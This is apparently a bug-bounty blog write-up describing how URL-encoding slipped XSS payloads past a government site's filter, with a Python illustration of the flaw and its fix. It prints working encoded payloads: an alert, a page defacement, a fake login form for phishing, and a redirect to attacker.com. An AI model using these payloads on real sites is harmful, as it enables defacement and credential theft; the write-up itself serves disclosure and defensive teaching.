While testing a government web application, I tried the usual XSS payloads against the main domain. Nothing worked. Every obvious attempt was blocked, filtered, or simply ignored.

It felt like a dead end.

But in security testing, "nothing works" is often just the beginning.

Like any tester, I started with the basics:

<script>alert(1)</script>

The application handled it well. No execution, no reflection, nothing suspicious.

But there was something about the behavior that didn't feel complete. The filtering seemed too specific, too focused on obvious patterns.

Instead of asking "why is this blocked?", I asked a better question:

What is the filter not seeing?

I stopped sending payloads as plain text.

Instead, I encoded them.

%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E

Then passed it into the application:

https://test.com/search?q=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E

No rejection. No filtering.

Just a normal response.

And then it happened.

The browser decoded the payload.

The application reflected it.

And the JavaScript executed.

No complex exploit. No advanced bypass.

Just encoding.
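The pattern described above, as an added example that is not part of the original write-up: a blocklist that inspects the raw query string before the framework percent-decodes it misses the encoded payload, while canonicalizing first and HTML-encoding on output stops it regardless of the blocklist. The blocklist contents and the `/search?q=` handler are assumptions; the canonicalize step also handles double encoding, which goes beyond the single-encoded case the post shows.

```python
import html
from urllib.parse import unquote

# Assumed blocklist: literal markup patterns only, as the post's filter seemed to use.
BLOCKLIST = ("<script", "<img", "onerror=")

# Constructed inputs: the plain payload the filter caught and the
# percent-encoded form from the write-up that slipped through.
PLAIN_PAYLOAD = "<script>alert(1)</script>"
ENCODED_PAYLOAD = "%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"


def canonicalize(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), so any
    check sees what the application will ultimately render."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def naive_reflect(raw_query: str) -> str:
    """Flawed pattern: the blocklist runs on the raw, still-encoded value;
    the framework decodes it afterwards and the template echoes it as HTML."""
    if any(p in raw_query.lower() for p in BLOCKLIST):
        return "blocked"
    return f"<p>Results for: {unquote(raw_query)}</p>"


def hardened_reflect(raw_query: str) -> str:
    """Defence: canonicalize first, then HTML-encode on output. Escaping,
    not the blocklist, is what keeps the injected markup from rendering."""
    decoded = canonicalize(raw_query)
    return f"<p>Results for: {html.escape(decoded, quote=True)}</p>"


def markup_injected(rendered: str) -> bool:
    """Detection helper: does the rendered fragment contain a live
    injected tag? (Only the tags used in this example are checked.)"""
    lowered = rendered.lower()
    return "<img" in lowered or "<script" in lowered


if __name__ == "__main__":
    print(naive_reflect(PLAIN_PAYLOAD))      # blocked
    print(naive_reflect(ENCODED_PAYLOAD))    # live <img ... onerror=...> tag
    print(hardened_reflect(ENCODED_PAYLOAD)) # escaped, rendered as text
```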

Once execution is possible, the impact quickly expands.

DOM Manipulation

https://test.com/search?q=%3Cimg%20src%3Dx%20onerror%3Ddocument.body.innerHTML%3D'Hacked'%3E

Phishing Attacks

https://test.com/search?q=%3Cimg%20src%3Dx%20onerror%3D%22document.body.innerHTML%3D'%3Ch2%3ESession%20Expired%3C/h2%3E%3Cinput%20placeholder%3DUsername%3E%3Cinput%20type%3Dpassword%3E%3Cbutton%3ELogin%3C/button%3E'%22%3E

Open Redirect

https://test.com/search?q=%3Cimg%20src%3Dx%20onerror%3D%22location%3D'https://attacker.com'%22%3E

After confirming the vulnerability, I submitted the report with full confidence.

Everything was there:

  • Clean explanation
  • Working payload
  • Solid impact

I was already imagining the "Valid" status.

But guess what?

Marked as duplicate.
